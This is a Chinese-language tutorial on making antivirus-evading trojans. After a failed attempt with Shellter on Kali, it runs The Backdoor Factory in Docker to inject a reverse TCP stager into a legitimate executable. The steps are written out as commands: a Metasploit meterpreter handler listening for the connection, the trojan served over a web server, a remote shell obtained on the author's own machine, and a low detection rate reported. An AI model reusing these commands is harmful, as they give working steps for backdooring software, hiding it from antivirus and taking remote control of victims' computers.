Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀。
官网地址:
可以在官网下载window版本的
安装shellter
我使用的是kali进行安装
步骤:
apt-get update(事先更新)
apt install shellter 安装它
使用命令试试
告诉我需要安装wine32
dpkg --add-architecture i386 && apt update && apt -y install wine32 ————————安装wine32
执行完后好几分钟
开始执行,报错
网上找原因几次尝试,放弃了
于是换给免杀工具BDF
先安装docker部署
执行
apt -y install docker docker-compose ----安装它
给虚拟环境部署为阿里
下载环境
docker pull secretsquirrel/the-backdoor-factory
查看一下是否下好
进入到试试看
docker run -it -v /root/ms:/tmp secretsquirrel/the-backdoor-factory bash
实现ms文件夹和docker的tmp同步
上传一个exe过去
开始使用BDf
部署时用IP地址时发现没IP地址了
把网卡重启一下
ifconfig eth0 down / ifconfig eth0 up
所有网卡重启:service network restart
制作木马
这就把geek文件做成木马了,监听5566
./backdoor.py -f /tmp/geek.exe -s iat_reverse_tcp_stager_threaded -H 192.168.173.35 -P 5566
做好了就用msf来接听实现访问shell
handler -H 192.168.173.35 -P 5566 -p windows/meterpreter/reverse_tcp
测试
现在就开始测试了
先把这个geek改名然后把他放到tmp文件中实现同步
再把它放到kail的/var/www/html下
开启web
直接拿物理机测试
访问IP地址
监听成功
然后就连接那些呐
确实是我的物理机
测试免杀率
在这里测试查杀率
很低达的查杀率,还行